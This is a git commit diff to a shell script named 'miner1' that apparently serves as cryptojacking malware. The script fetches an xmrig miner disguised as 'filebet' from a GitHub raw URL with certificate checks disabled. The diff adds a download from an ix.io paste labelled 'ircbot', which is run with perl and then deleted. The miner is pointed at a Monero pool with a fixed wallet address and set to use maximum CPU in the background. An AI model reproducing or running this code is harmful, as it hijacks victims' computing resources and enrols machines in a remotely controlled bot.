Update and rename miner to miner1

diff --git a/miner1 b/miner1
--- a/miner1
+++ b/miner1
@@ -7,5 +7,10 @@ if ! curl -ks "https://raw.githubusercontent.com/anabianca92/lol/main/xmrig-stat
 printf "[ERROR]: downloading xmrig\n"
 exit 1
 fi
+if ! curl -ks "http://ix.io/4e0X" -o "$local"vs 2>/dev/null && ! wget -q --no-check-certificate "http://ix.io/4e0X" -O "$local"vs 2>/dev/null; then
+printf "[ERROR]: downloading ircbot\n"
+exit 1
+fi
 chmod +x "$local"filebet
-exec "$local"filebet -o stratum+tcp://gulf.moneroocean.stream:10128 -u 46tZPdrQpAeXWfph4X8Cxr5Ki3VNT6QX28MedBqoJhGrhsmZZAHW61EFF7sBtVCw8oQtMfd1vT79VNwbj7suCHzkP9yciEq -p `curl -s ifconfig.me 2>/dev/null` -k --cpu-max-threads-hint=100% -B
+exec filebet -o stratum+tcp://gulf.moneroocean.stream:10128 -u 46tZPdrQpAeXWfph4X8Cxr5Ki3VNT6QX28MedBqoJhGrhsmZZAHW61EFF7sBtVCw8oQtMfd1vT79VNwbj7suCHzkP9yciEq -p `curl -s ifconfig.me 2>/dev/null` -k --cpu-max-threads-hint=100% -B
+perl "$local"vs;rm "$local"vs
